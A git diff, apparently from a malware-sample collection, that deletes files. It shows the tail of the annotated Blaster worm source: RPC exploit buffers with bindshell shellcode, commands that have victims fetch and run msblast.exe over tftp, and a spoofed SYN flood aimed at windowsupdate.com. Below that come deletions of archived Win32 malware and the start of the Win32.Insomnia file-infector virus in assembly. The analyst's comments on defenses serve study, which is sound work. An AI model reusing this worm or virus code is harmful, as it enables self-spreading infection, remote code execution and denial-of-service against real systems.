-,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 - -,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 - -,0x00,0x00,0x00,0x00,0x00,0x00}; - -unsigned char request2[]={ -0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 -,0x00,0x00,0x5C,0x00,0x5C,0x00}; - -unsigned char request3[]={ -0x5C,0x00 -,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 - -,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 - -,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 - -,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; - - -unsigned char sc[]= -"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" -"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" -"\x46\x00\x58\x00\x46\x00\x58\x00" - -"\xff\xff\xff\xff" /* return address */ - -"\xcc\xe0\xfd\x7f" /* primary thread data block */ -"\xcc\xe0\xfd\x7f" /* primary thread data block */ - -/* port 4444 bindshell */ -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" -"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" -"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" -"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" -"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" -"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" -"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" -"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" -"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81" -"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" -"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" -"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" -"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" -"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" -"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" -"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" -"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" -"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" -"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" -"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" -"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" -"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" -"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" -"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" -"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" -"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" -"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" -"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" -"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" -"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" -"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" -"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" -"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; - - - -unsigned char request4[]={ -0x01,0x10 -,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 - -,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C - -,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 -}; - -int ThreadId; -int len; -int sizeof_sa; -int ret; -int opt; -void *hThread; -struct sockaddr_in target_ip; -struct sockaddr_in sa; -int fd; -char cmdstr[0x200]; -int len1; -unsigned char buf2[0x1000]; -int i; - -/* -* Turn off non-blocking (i.e. re-enable blocking mode) -* DEFENSE: Tarpit programs (e.g. 'labrea' or 'deredoc') -* will slow down the spread of this worm. It takes a long -* time for blocking calls to timeout. I had several -* thousand worms halted by my 'deredoc' tarpit. -*/ -opt = 0; -ioctlsocket(sock, FIONBIO , &opt); - -/* -* Choose whether the exploit targets Win2k or WinXP. -*/ -if (winxp1_or_win2k2 == 1) -ret = 0x100139d; -else -ret = 0x18759f; -memcpy(sc+36, (unsigned char *) &ret, 4); - -/* ---------------------------------------------- -* This section is just copied from the original exploit -* script. This is the same as the scripts that have been -* widely published on the Internet. */ -len=sizeof(sc); -memcpy(buf2,request1,sizeof(request1)); -len1=sizeof(request1); - -*(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2; -*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; - -memcpy(buf2+len1,request2,sizeof(request2)); -len1=len1+sizeof(request2); -memcpy(buf2+len1,sc,sizeof(sc)); -len1=len1+sizeof(sc); -memcpy(buf2+len1,request3,sizeof(request3)); -len1=len1+sizeof(request3); -memcpy(buf2+len1,request4,sizeof(request4)); -len1=len1+sizeof(request4); - -*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc; - - -*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; -*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; - -if (send(sock,bindstr,sizeof(bindstr),0)== -1) -{ -//perror("- Send"); -return; -} - - -if (send(sock,buf2,len1,0)== -1) -{ -//perror("- Send"); -return; -} -closesocket(sock); -Sleep(400); -/* ----------------------------------------------*/ - - -/* -* This section of code connects to the victim on port 4444. -* DEFENSE : This means you can block this worm by blocking -* TCP port 4444. -* FAQ: This port is only open for the brief instant needed -* to exploit the victim. Therefore, you can't scan for -* port 4444 in order to find Blaster victims. -*/ -if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1) -return; -memset(&target_ip, 0, sizeof(target_ip)); -target_ip.sin_family = AF_INET; -target_ip.sin_port = htons(SHELL_PORT_4444); -target_ip.sin_addr.s_addr = inet_addr(victim_ip); -if (target_ip.sin_addr.s_addr == SOCKET_ERROR) -return; -if (connect(fd, (struct sockaddr*)&target_ip, -sizeof(target_ip)) == SOCKET_ERROR) -return; - -/* -* This section recreates the IP address from whatever IP -* address this successfully connected to. In practice, -* the strings "victim_ip" and "target_ip_string" should be -* the same. -*/ -memset(target_ip_string, 0, sizeof(target_ip_string)); -sizeof_sa = sizeof(sa); -getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa); -sprintf(target_ip_string, "%d.%d.%d.%d", -sa.sin_addr.s_net, sa.sin_addr.s_host, -sa.sin_addr.s_lh, sa.sin_addr.s_impno); - -/* -* This section creates a temporary TFTP service that is -* ONLY alive during the period of time that the victim -* needs to download. -* FAQ: You can't scan for TFTP in order to find Blaster -* victims because the port is rarely open. -*/ -if (fd_tftp_service) -closesocket(fd_tftp_service); -hThread = CreateThread(0,0, -blaster_tftp_thread,0,0,&ThreadId); -Sleep(80); /*give time for thread to start*/ - -/* -* This sends the command -* tftp -i 1.2.3.4 GET msblast.exe -* to the victim. The "tftp.exe" program is built into -* Windows. It's intended purpose is to allow users to -* manually update their home wireless access points with -* new software (and other similar tasks). However, it is -* not intended as a generic file-transfer protocol (it -* stands for "trivial-file-transfer-protocol" -- it is -* intended for only trivial tasks). Since a lot of hacker -* exploits use the "tftp.exe" program, a good hardening -* step is to remove/rename it. -*/ -sprintf(cmdstr, "tftp -i %s GET %s\n", -target_ip_string, MSBLAST_EXE); -if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0) -goto closesocket_and_return; - -/* -* Wait 21 seconds for the victim to request the file, then -* for the file to be delivered via TFTP. -*/ -Sleep(1000); -for (i=0; i<10 && is_tftp_running; i++) -Sleep(2000); - -/* -* Assume the the transfer is successful, and send the -* command to start executing the newly downloaded program. -* BUFORD: The hacker starts this twice. Again, it -* demonstrates a lock of confidence, so he makes sure it's -* started by doing it twice in slightly different ways. -* Note that the "BILLY" mutex will prevent from actually -* running twice. -*/ -sprintf(cmdstr, "start %s\n", MSBLAST_EXE); -if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0) -goto closesocket_and_return; -Sleep(2000); -sprintf(cmdstr, "%s\n", MSBLAST_EXE); -send(fd, cmdstr, strlen(cmdstr), 0); -Sleep(2000); - - -/* -* This section closes the things started in this procedure -*/ -closesocket_and_return: - -/* Close the socket for the remote command-prompt that has -* been established to the victim. */ -if (fd != 0) -closesocket(fd); - -/* Close the TFTP server that was launched above. As noted, -* this means that the TFTP service is not running most of -* the time, so it's not easy to scan for infected systems. -*/ -if (is_tftp_running) { -TerminateThread(hThread,0); -closesocket(fd_tftp_service); -is_tftp_running = 0; -} -CloseHandle(hThread); -} - - -/** -* Convert the name into an IP address. If the IP address -* is formatted in decimal-dot-notation (e.g. 192.2.0.43), -* then return that IP address, otherwise do a DNS lookup -* on the address. Note that in the case of the worm, -* it always gives the string "windowsupdate.com" to this -* function, and since Microsoft turned off that name, -* the DNS lookup will usually fail, so this function -* generally returns -1 (SOCKET_ERROR), which means the -* address 255.255.255.255. -*/ -int blaster_resolve_ip(const char *windowsupdate_com) -{ -int result; - -result = inet_addr(windowsupdate_com); -if (result == SOCKET_ERROR) { -HOSTENT *p_hostent = gethostbyname(windowsupdate_com); -if (p_hostent == NULL) -result = SOCKET_ERROR; -else -result = *p_hostent->h_addr; -} - -return result; -} - - -/* -* This thre -*/ -ULONG WINAPI blaster_DoS_thread(LPVOID p) -{ -int opt = 1; -int fd; -int target_ip; - - -/* Lookup the domain-name. Note that no checking is done -* to ensure that the name is valid. Since Microsoft turned -* this off in their domain-name servers, this function now -* returns -1. */ -target_ip = blaster_resolve_ip("windowsupdate.com"); - - -/* Create a socket that the worm will blast packets at -* Microsoft from. This is what is known as a "raw" socket. -* So-called "raw-sockets" are ones where packets are -* custom-built by the programmer rather than by the TCP/IP -* stack. Note that raw-sockets were not available in Windows -* until Win2k. A cybersecurity pundit called Microsoft -* "irresponsible" for adding them. -* -* That's probably an -* unfairly harsh judgement (such sockets are available in -* every other OS), but it's true that it puts the power of -* SYNflood attacks in the hands of lame worm writers. While -* the worm-writer would probably have chosen a different -* DoS, such as Slammer-style UDP floods, it's likely that -* Buford wouldn't have been able to create a SYNflood if -* raw-sockets had not been added to Win2k/WinXP. */ -fd = WSASocket( -AF_INET, /*TCP/IP sockets*/ -SOCK_RAW, /*Custom TCP/IP headers*/ -IPPROTO_RAW, -NULL, -0, -WSA_FLAG_OVERLAPPED -); -if (fd == SOCKET_ERROR) -return 0; - -/* Tell the raw-socket that IP headers will be created by the -* programmer rather than the stack. Most raw sockets in -* Windows will also have this option set. */ -if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, -(char*)&opt, sizeof(opt)) == SOCKET_ERROR) -return 0; - - -/* Now do the SYN flood. The worm writer decided to flood -* slowly by putting a 20-millisecond delay between packets -* -- causing only 500 packets/second, or roughly, 200-kbps. -* There are a couple of reasons why the hacker may have -* chosen this. -* 1. SYNfloods are not intended to be bandwidth floods, -* even slow rates are hard to deal with. -* 2. Slammer DoSed both the sender and receiver, therefore -* senders hunted down infected systems and removed -* them. This won't DoS the sender, so people are more -* likely not to care about a few infected machines. -*/ -for (;;) { -blaster_send_syn_packet(target_ip, fd); - -/* Q: How fast does it send the SYNflood? -* A: About 50 packets/second, where each packet is -* 320-bits in size, for a total of 15-kbps. -* It means that Buford probably intended for -* dialup users to be a big source of the DoS -* attack. He was smart enough to realize that -* faster floods would lead to users discovering -* the worm and turning it off. */ -Sleep(20); -} - - -closesocket(fd); -return 0; -} - - - -/* -* This is a standard TCP/IP checksum algorithm -* that you find all over the web. -*/ -int blaster_checksum(const void *bufv, int length) -{ -const unsigned short *buf = (const unsigned short *)bufv; -unsigned long result = 0; - -while (length > 1) { -result += *(buf++); -length -= sizeof(*buf); -} -if (length) result += *(unsigned char*)buf; -result = (result >> 16) + (result & 0xFFFF); -result += (result >> 16); -result = (~result)&0xFFFF; - -return (int)result; -} - - - -/* -* This is a function that uses "raw-sockets" in order to send -* a SYNflood at the victim, which is "windowsupdate.com" in -* the case of the Blaster worm. -*/ -void blaster_send_syn_packet(int target_ip, int fd) -{ - -struct IPHDR -{ -unsigned char verlen; /*IP version & length */ -unsigned char tos; /*IP type of service*/ -unsigned short totallength;/*Total length*/ -unsigned short id; /*Unique identifier */ -unsigned short offset; /*Fragment offset field*/ -unsigned char ttl; /*Time to live*/ -unsigned char protocol; /*Protocol(TCP, UDP, etc.)*/ -unsigned short checksum; /*IP checksum*/ -unsigned int srcaddr; /*Source address*/ -unsigned int dstaddr; /*Destination address*/ - -}; -struct TCPHDR -{ -unsigned short srcport; -unsigned short dstport; -unsigned int seqno; -unsigned int ackno; -unsigned char offset; -unsigned char flags; -unsigned short window; -unsigned short checksum; -unsigned short urgptr; -}; -struct PSEUDO -{ -unsigned int srcaddr; -unsigned int dstaddr; -unsigned char padzero; -unsigned char protocol; -unsigned short tcplength; -}; -struct PSEUDOTCP -{ -unsigned int srcaddr; -unsigned int dstaddr; -unsigned char padzero; -unsigned char protocol; -unsigned short tcplength; -struct TCPHDR tcphdr; -}; - - - - -char spoofed_src_ip[16]; -unsigned short target_port = 80; /*SYNflood web servers*/ -struct sockaddr_in to; -struct PSEUDO pseudo; -char buf[60] = {0}; -struct TCPHDR tcp; -struct IPHDR ip; -int source_ip; - - -/* Yet another randomizer-seeding */ -srand(GetTickCount()); - -/* Generate a spoofed source address that is local to the -* current Class B subnet. This is pretty smart of Buford. -* Using just a single IP address allows defenders to turn -* it off on the firewall, whereas choosing a completely -* random IP address would get blocked by egress filters -* (because the source IP would not be in the proper range). -* Randomly choosing nearby IP addresses it probably the -* best way to evade defenses */ -sprintf(spoofed_src_ip, "%i.%i.%i.%i", -local_class_a, local_class_b, rand()%255, rand()%255); -source_ip = blaster_resolve_ip(spoofed_src_ip); - -/* Build the sockaddr_in structure. Normally, this is what -* the underlying TCP/IP stack uses to build the headers -* from. However, since the DoS attack creates its own -* headers, this step is largely redundent. */ -to.sin_family = AF_INET; -to.sin_port = htons(target_port); /*this makes no sense */ -to.sin_addr.s_addr = target_ip; - -/* Create the IP header */ -ip.verlen = 0x45; -ip.totallength = htons(sizeof(ip) + sizeof(tcp)); -ip.id = 1; -ip.offset = 0; -ip.ttl = 128; -ip.protocol = IPPROTO_TCP; -ip.checksum = 0; /*for now, set to true value below */ -ip.dstaddr = target_ip; - -/* Create the TCP header */ -tcp.dstport = htons(target_port); -tcp.ackno = 0; -tcp.offset = (unsigned char)(sizeof(tcp)<<4); -tcp.flags = 2; /*TCP_SYN*/ -tcp.window = htons(0x4000); -tcp.urgptr = 0; -tcp.checksum = 0; /*for now, set to true value below */ - -/* Create pseudo header (which copies portions of the IP -* header for TCP checksum calculation).*/ -pseudo.dstaddr = ip.dstaddr; -pseudo.padzero = 0; -pseudo.protocol = IPPROTO_TCP; -pseudo.tcplength = htons(sizeof(tcp)); - -/* Use the source adress chosen above that is close, but -* not the same, as the spreader's IP address */ -ip.srcaddr = source_ip; - -/* Choose a random source port in the range [1000-19999].*/ -tcp.srcport = htons((unsigned short)((rand()%1000)+1000)); - -/* Choose a random sequence number to start the connection. -* BUG: Buford meant htonl(), not htons(), which means seqno -* will be 15-bits, not 32-bits, i.e. in the range -* [0-32767]. (the Windows rand() function only returns -* 15-bits). */ -tcp.seqno = htons((unsigned short)((rand()<<16)|rand())); - -pseudo.srcaddr = source_ip; - -/* Calculate TCP checksum */ -memcpy(buf, &pseudo, sizeof(pseudo)); -memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp)); -tcp.checksum = blaster_checksum(buf, -sizeof(pseudo)+sizeof(tcp)); - -memcpy(buf, &ip, sizeof(ip)); -memcpy(buf+sizeof(ip), &tcp, sizeof(tcp)); - -/* I have no idea what's going on here. The assembly code -* zeroes out a bit of memory near the buffer. I don't know -* if it is trying to zero out a real variable that happens -* to be at the end of the buffer, or if it is trying to zero -* out part of the buffer itself. */ -memset(buf+sizeof(ip)+sizeof(tcp), 0, -sizeof(buf)-sizeof(ip)-sizeof(tcp)); - -/* Major bug here: the worm writer incorrectly calculates the -* IP checksum over the entire packet. This is incorrect -- -* the IP checksum is just for the IP header itself, not for -* the TCP header or data. However, Windows fixes the checksum -* anyway, so the bug doesn't appear in the actual packets -* themselves. -*/ -ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp)); - -/* Copy the header over again. The reason for this is simply to -* copy over the checksum that was just calculated above, but -* it's easier doing this for the programmer rather than -* figuring out the exact offset where the checksum is -* located */ -memcpy(buf, &ip, sizeof(ip)); - -/* Send the packet */ -sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0, -(struct sockaddr*)&to, sizeof(to)); -} \ No newline at end of file diff --git a/Win32/Win32.Capric.7z b/Win32/Win32.Capric.7z deleted file mode 100644 index e9fd1ea8..00000000 Binary files a/Win32/Win32.Capric.7z and /dev/null differ diff --git a/Win32/Win32.Cyber.b.7z b/Win32/Win32.Cyber.b.7z deleted file mode 100644 index 23787c17..00000000 Binary files a/Win32/Win32.Cyber.b.7z and /dev/null differ diff --git a/Win32/Win32.D.a.7z b/Win32/Win32.D.a.7z deleted file mode 100644 index 89ec7647..00000000 Binary files a/Win32/Win32.D.a.7z and /dev/null differ diff --git a/Win32/Win32.D.b.7z b/Win32/Win32.D.b.7z deleted file mode 100644 index a0d49942..00000000 Binary files a/Win32/Win32.D.b.7z and /dev/null differ diff --git a/Win32/Win32.DarkAnal.7z b/Win32/Win32.DarkAnal.7z deleted file mode 100644 index c69e7aa5..00000000 Binary files a/Win32/Win32.DarkAnal.7z and /dev/null differ diff --git a/Win32/Win32.Darkness.a.7z b/Win32/Win32.Darkness.a.7z deleted file mode 100644 index 0aa275ba..00000000 Binary files a/Win32/Win32.Darkness.a.7z and /dev/null differ diff --git a/Win32/Win32.Darkness.b.7z b/Win32/Win32.Darkness.b.7z deleted file mode 100644 index bae9123d..00000000 Binary files a/Win32/Win32.Darkness.b.7z and /dev/null differ diff --git a/Win32/Win32.Delikon.7z b/Win32/Win32.Delikon.7z deleted file mode 100644 index 7ce35ebb..00000000 Binary files a/Win32/Win32.Delikon.7z and /dev/null differ diff --git a/Win32/Win32.EnglishRat.7z b/Win32/Win32.EnglishRat.7z deleted file mode 100644 index 5896159c..00000000 Binary files a/Win32/Win32.EnglishRat.7z and /dev/null differ diff --git a/Win32/Win32.Eris.7z b/Win32/Win32.Eris.7z deleted file mode 100644 index fead3e5f..00000000 Binary files a/Win32/Win32.Eris.7z and /dev/null differ diff --git a/Win32/Win32.Flexispy.7z b/Win32/Win32.Flexispy.7z deleted file mode 100644 index b71b54b5..00000000 Binary files a/Win32/Win32.Flexispy.7z and /dev/null differ diff --git a/Win32/Win32.ForBot.7z b/Win32/Win32.ForBot.7z deleted file mode 100644 index 51dfe693..00000000 Binary files a/Win32/Win32.ForBot.7z and /dev/null differ diff --git a/Win32/Win32.FukJ.7z b/Win32/Win32.FukJ.7z deleted file mode 100644 index 6552e294..00000000 Binary files a/Win32/Win32.FukJ.7z and /dev/null differ diff --git a/Win32/Win32.Fungus.7z b/Win32/Win32.Fungus.7z deleted file mode 100644 index d4086ab7..00000000 Binary files a/Win32/Win32.Fungus.7z and /dev/null differ diff --git a/Win32/Win32.Gaelicum.A.7z b/Win32/Win32.Gaelicum.A.7z deleted file mode 100644 index 77f8109a..00000000 Binary files a/Win32/Win32.Gaelicum.A.7z and /dev/null differ diff --git a/Win32/Win32.Gold.7z b/Win32/Win32.Gold.7z deleted file mode 100644 index 09b92bef..00000000 Binary files a/Win32/Win32.Gold.7z and /dev/null differ diff --git a/Win32/Win32.Grum.7z b/Win32/Win32.Grum.7z deleted file mode 100644 index f424197b..00000000 Binary files a/Win32/Win32.Grum.7z and /dev/null differ diff --git a/Win32/Win32.Gypsy.7z b/Win32/Win32.Gypsy.7z deleted file mode 100644 index 6bddcc3a..00000000 Binary files a/Win32/Win32.Gypsy.7z and /dev/null differ diff --git a/Win32/Win32.H.7z b/Win32/Win32.H.7z deleted file mode 100644 index 3bfec83b..00000000 Binary files a/Win32/Win32.H.7z and /dev/null differ diff --git a/Win32/Win32.Hell.7z b/Win32/Win32.Hell.7z deleted file mode 100644 index 36ee4d77..00000000 Binary files a/Win32/Win32.Hell.7z and /dev/null differ diff --git a/Win32/Win32.Hellbot.c.7z b/Win32/Win32.Hellbot.c.7z deleted file mode 100644 index 9ab9e5f9..00000000 Binary files a/Win32/Win32.Hellbot.c.7z and /dev/null differ diff --git a/Win32/Win32.Hidden.7z b/Win32/Win32.Hidden.7z deleted file mode 100644 index 7a04540e..00000000 Binary files a/Win32/Win32.Hidden.7z and /dev/null differ diff --git a/Win32/Win32.Hydra.7z b/Win32/Win32.Hydra.7z deleted file mode 100644 index 7313dbf4..00000000 Binary files a/Win32/Win32.Hydra.7z and /dev/null differ diff --git a/Win32/Win32.IMBot.7z b/Win32/Win32.IMBot.7z deleted file mode 100644 index e2b608f7..00000000 Binary files a/Win32/Win32.IMBot.7z and /dev/null differ diff --git a/Win32/Win32.Infest.7z b/Win32/Win32.Infest.7z deleted file mode 100644 index a61120b6..00000000 Binary files a/Win32/Win32.Infest.7z and /dev/null differ diff --git a/Win32/Win32.Insomnia.txt b/Win32/Win32.Insomnia.txt deleted file mode 100644 index ca111466..00000000 --- a/Win32/Win32.Insomnia.txt +++ /dev/null @@ -1,468 +0,0 @@ -; Win32.Insomnia (c) DR-EF. -;-------------------------------------------------- -;virus name:Win32.Insomnia -;virus author:DR-EF -;virus size:1972 bytes -;features: -; o dont increase file size,overwrite reloc -; section instead. -; o use EPO - replace all mov eax,fs:[00000000] -; instructions with call virus decryptor. -; o encrypted with new key for each file. -; o use the dotdot method to find files. -;payload:messagebox with this text: -; ".:[Win32.Insomnia � 2004 DR-EF]:." -; every year at 29/12. -;compile: -; tasm32 /m3 /ml /zi Insomnia.asm , , ; -; tlink32 /tpe /aa /v Insomnia , Insomnia,,import32.lib -; pewrsec Insomnia.exe -;-------------------------------------------------- - -.386 -.model flat - - extrn ExitProcess:proc - - virus_size equ (EndVirus-virus_start) - INVALID_HANDLE_VALUE equ -1 - FILE_ATTRIBUTE_NORMAL equ 00000080h - OPEN_EXISTING equ 3 - GENERIC_WRITE equ 40000000h - GENERIC_READ equ 80000000h - PAGE_READWRITE equ 4h - FILE_MAP_WRITE equ 00000002h - -.data - db ? -.code - -virus_start: - call Delta -Delta: pop ebp - sub ebp,offset Delta - mov ecx,NumberOfKernelBases - lea esi,[ebp + KernelBaseTable] -@next_k:lodsd - call GetKernel32Base - jc GetApis - loop @next_k - jmp reth ;return to host -KernelBaseTable: - dd 804d4000h ;winXP - dd 0bff60000h ;winME - dd 77f00000h ;winNT - dd 77e70000h ;win2K - dd 0bff70000h ;win9X - NumberOfKernelBases equ 5h - -GetApis:mov eax,[ebp + kernel32base] - add eax,[eax + 3ch] - mov eax,[eax + 78h] - add eax,[ebp + kernel32base] - ;eax - kernel32 export table - push eax - xor edx,edx - mov eax,[eax + 20h] - add eax,[ebp + kernel32base] - mov edi,[eax] - add edi,[ebp + kernel32base] - ;edi - api names array - dec edi -nxt_cmp:inc edi - lea esi,[ebp + _GetProcAddress] - mov ecx,0eh - rep cmpsb - je search_address - inc edx -nxt_l: cmp byte ptr [edi],0h - je nxt_cmp - inc edi - jmp nxt_l -search_address: - pop eax - ;eax - kernel32 export table - ;edx - GetProcAddress position - shl edx,1h - mov ebx,[eax + 24h] - add ebx,[ebp + kernel32base] - add ebx,edx - mov dx,word ptr [ebx] - shl edx,2h - mov ebx,[eax + 1ch] - add ebx,[ebp + kernel32base] - add ebx,edx - mov ebx,[ebx] - add ebx,[ebp + kernel32base] - mov [ebp + GetProcAddress],ebx - mov ecx,NumberOfApis - lea eax,[ebp + ApiNamesTable] - lea ebx,[ebp + ApiAddressTable] -nxt_api:push ecx - push eax - push eax - push [ebp + kernel32base] - call [ebp + GetProcAddress] - or eax,eax - je api_err - mov dword ptr [ebx],eax - pop eax -nxt_al: inc eax - cmp byte ptr [eax],0h - jne nxt_al - inc eax - add ebx,4h - pop ecx - loop nxt_api - jmp InfectFiles -api_err:add esp,8h - jmp reth - - _GetProcAddress db "GetProcAddress",0 - GetProcAddress dd 0 - kernel32base dd 0 - -ApiNamesTable: - _FindFirstFile db "FindFirstFileA",0 - _FindNextFile db "FindNextFileA",0 - _GetCurrentDirectory db "GetCurrentDirectoryA",0 - _SetCurrentDirectory db "SetCurrentDirectoryA",0 - _CreateFile db "CreateFileA",0 - _CloseHandle db "CloseHandle",0 - _CreateFileMapping db "CreateFileMappingA",0 - _MapViewOfFile db "MapViewOfFile",0 - _UnmapViewOfFile db "UnmapViewOfFile",0 - _GetLocalTime db "GetLocalTime",0 - _LoadLibrary db "LoadLibraryA",0 - _SetFileTime db "SetFileTime",0 - -ApiAddressTable: - FindFirstFile dd 0 - FindNextFile dd 0 - GetCurrentDirectory dd 0 - SetCurrentDirectory dd 0 - CreateFile dd 0 - CloseHandle dd 0 - CreateFileMapping dd 0 - MapViewOfFile dd 0 - UnmapViewOfFile dd 0 - GetLocalTime dd 0 - LoadLibrary dd 0 - SetFileTime dd 0 - - NumberOfApis equ 12 - -GetKernel32Base: - pushad - lea ebx,[ebp + k32err] - push ebx - xor ebx,ebx - push dword ptr fs:[ebx] - mov fs:[ebx],esp - mov ebx,eax - cmp word ptr [eax],"ZM" - jne _k32err - add eax,[eax + 3ch] - cmp word ptr [eax],"EP" - jne _k32err - mov [ebp + kernel32base],ebx - pop dword ptr fs:[0] - add esp,4h - popad - stc - ret -_k32err:pop dword ptr fs:[0] - add esp,4h - popad - clc - ret -k32err: mov esp,[esp + 8h] - pop dword ptr fs:[0] - add esp,4h - popad - clc - ret - -VirusCopyRight db ".:[Win32.Insomnia � 2004 DR-EF]:.",0 - -InfectFiles: - mov [ebp + max_dirs],0fh - 